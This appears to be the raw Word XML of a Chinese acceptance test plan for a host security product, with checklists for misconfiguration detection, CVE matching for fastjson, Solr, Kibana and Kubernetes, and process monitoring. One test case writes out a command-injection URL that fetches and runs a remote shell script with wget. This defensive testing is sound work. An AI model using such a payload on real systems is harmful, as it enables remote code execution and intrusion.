                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t xml:space="preserve">             </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>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仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7634"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rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>人员签字</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7634" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>建行：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>____________________</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">        厂商：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>____________________</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="104" w:name="_Toc8017"/>
      <w:bookmarkStart w:id="105" w:name="_Toc1051467491"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:t>软件配置缺陷检测</w:t>
      </w:r>
      <w:bookmarkEnd w:id="104"/>
      <w:bookmarkEnd w:id="105"/>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tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="top"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检测主流中间件:Apache、weblogic、nginx以及主流数据库mysql的配置缺陷，说明存在的风险，并且提供修改方案。比如启动权限过高，允许列出目录，泄露容器选型和版本信息；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t>测试产品是否具有中间件配置缺陷检查功能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pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="48"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>主机操作系统到服务端网络访问关系通畅</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="48"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>主机预先安装Apache、weblogic、mysql、nginx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2"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49"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>以root启动mysql、nginx（环境准备时以root启动）</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="49"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">修改apache配置文件vi /home/soft/httpd/conf/httpd.conf，在&lt;Directory&gt;节点下添加Options Indexes FollowSymLinks    </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="49"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>修改weblogic配置文件vi /home/soft/weblogic/ /wlserver_10.3/server/lib/consoleapp/webapp/WEB-INF/weblogic.xml</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>添加&lt;index-directory-enabled&gt;true&lt;/index-directory-enabled&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="49"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>对主机进行配置风险扫描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rPr>
              <w:t>结果1：能扫描到mysql、nginx启动权限过高</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>结果2：能列出apache、weblogic允许目录列出风险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支持检测mysql配置缺陷    </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">      </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">口 通过   口 未通过  口 未测试 </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">支持检测nginx配置缺陷 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">     </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">       </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>口 通过   口 未通过  口 未测试</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">支持检测apache配置缺陷    </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">       </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve"> 口 通过   口 未通过  口 未测试</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">支持检测weblogic配置缺陷   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">      </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve"> 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
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开源软件漏洞匹配</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="27"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:tblpX="108" w:tblpY="1"/>
        <w:tblOverlap w:val="never"/>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开源软件采集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支持主机上的开源软件漏洞的匹配，开源软件包括：fastjson、Apache solr，kibana、kubernetes等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t>应用中带有fastjson</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
            <w:r>
              <w:t>安装Apache solr</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r>
              <w:t>kibana</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r>
              <w:t>kubernetes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pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minor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rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>查看资产采集模块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t>Fastjson</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>版本</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：1.2.37</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>安装路径</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：/home/soft/tomcat/webapps/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>存在漏洞</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> CNNVD-201907-699反序列化漏洞</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>Apache solr</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>版本</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：8.1.0</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>安装路径</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/home/soft/tomcat/webapps/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>存在漏洞</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> CVE-2019-0193授权问题漏洞</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>Kibana</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>版本</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：5.6.0</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>安装路径</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:t>/home/soft/kibana</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>存在漏洞</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> CVE-2019-7609命令注入漏洞</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>Kubernetes</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>版本</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：1.16.2</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>安装路径</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:t>/ usr/bin/minikube</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>存在漏洞</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="76"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="50"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Google Kubernetes 资源管理错误漏洞（ CVE-2020-8551）</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="76"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="50"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Google Kubernetes API Server 资源管理错误漏洞（CVE-2019-11254）</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检测到fastjson漏洞  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">     </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">口 通过   口 未通过  口 未测试 </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>检测到</w:t>
            </w:r>
            <w:r>
              <w:t>Apache solr</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">漏洞    </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">     </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>口 通过   口 未通过  口 未测试</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>检测到</w:t>
            </w:r>
            <w:r>
              <w:t>Kibana</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">漏洞       </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve"> 口 通过   口 未通过  口 未测试</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>检测到</w:t>
            </w:r>
            <w:r>
              <w:t>Kubernetes</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">漏洞   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">       </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve"> 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
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="106" w:name="_Toc136"/>
      <w:bookmarkStart w:id="107" w:name="_Toc151579183"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程</w:t>
      </w:r>
      <w:r>
        <w:t>行为监控</w:t>
      </w:r>
      <w:bookmarkEnd w:id="106"/>
      <w:bookmarkEnd w:id="107"/>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tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="top"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>支持对</w:t>
            </w:r>
            <w:r>
              <w:t>命令执行漏洞所调起的恶意命令告警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t>测试产品</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是否能够发现</w:t>
            </w:r>
            <w:r>
              <w:t>命令执行行为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pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="312"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t>部署环境中存在命令执行漏洞，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1"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51"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>将提前准备好的漏洞文件(code_exec.php)放入Web站点目录下。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="51"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">构造命令执行payload: </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> HYPERLINK "http://XX.XX.XX.XX/code_exec.php?shell=/bin/bash%20-c%20%22$(wget%20-q%20-O-%20http:/192.168.31.100/shell)%22" </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="31"/>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>http://ip/code_exec.php?shell=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="31"/>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>/bin/bash%20-c%20"$(wget%20-q%20-O-%20http://</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="31"/>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>ip</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="31"/>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>/shell)"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="31"/>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> 并直接访问payload</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="51"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>页面能够返回执行结果。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t>结果1: 服务端能够告警，有主机存在命令执行漏洞。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>结果2: 服务端不能发现命令执行。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2"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ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:pict>
                <v:shape id="_x0000_s1027" o:spid="_x0000_s1027" o:spt="75" alt="oleimage" type="#_x0000_t75" style="position:absolute;left:0pt;margin-left:63.3pt;margin-top:14.4pt;height:41.95pt;width:41.95pt;mso-wrap-distance-bottom:0pt;mso-wrap-distance-left:9pt;mso-wrap-distance-right:9pt;mso-wrap-distance-top:0pt;z-index:251660288;mso-width-relative:page;mso-height-relative:page;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
                  <v:path/>
                  <v:fill on="f" focussize="0,0"/>
                  <v:stroke on="f" joinstyle="miter"/>
                  <v:imagedata r:id="rId11" o:title="oleimage"/>
                  <o:lock v:ext="edit" aspectratio="t"/>
                  <w10:wrap type="square"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_s1027" DrawAspect="Icon" ObjectID="_1468075725" r:id="rId10">
                  <o:LockedField>false</o:LockedField>
                </o:OLEObject>
              </w:pict>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:pict>
                <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="75" alt="oleimage" type="#_x0000_t75" style="position:absolute;left:0pt;margin-left:-4.2pt;margin-top:9.15pt;height:47.7pt;width:47.7pt;mso-wrap-distance-bottom:0pt;mso-wrap-distance-top:0pt;z-index:251659264;mso-width-relative:page;mso-height-relative:page;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
                  <v:path/>
                  <v:fill on="f" focussize="0,0"/>
                  <v:stroke on="f" joinstyle="miter"/>
                  <v:imagedata r:id="rId13" o:title="oleimage"/>
                  <o:lock v:ext="edit" aspectratio="t"/>
                  <w10:wrap type="topAndBottom"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_s1026" DrawAspect="Icon" ObjectID="_1468075726" r:id="rId12">
                  <o:LockedField>false</o:LockedField>
                </o:OLEObj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108" w:name="_Toc22719"/>
      <w:bookmarkStart w:id="109" w:name="_Toc675723339"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>全盘木马实时监测</w:t>
      </w:r>
      <w:bookmarkEnd w:id="108"/>
      <w:bookmarkEnd w:id="109"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="27"/>
        <w:tblW w:w="907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0" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="top"/>
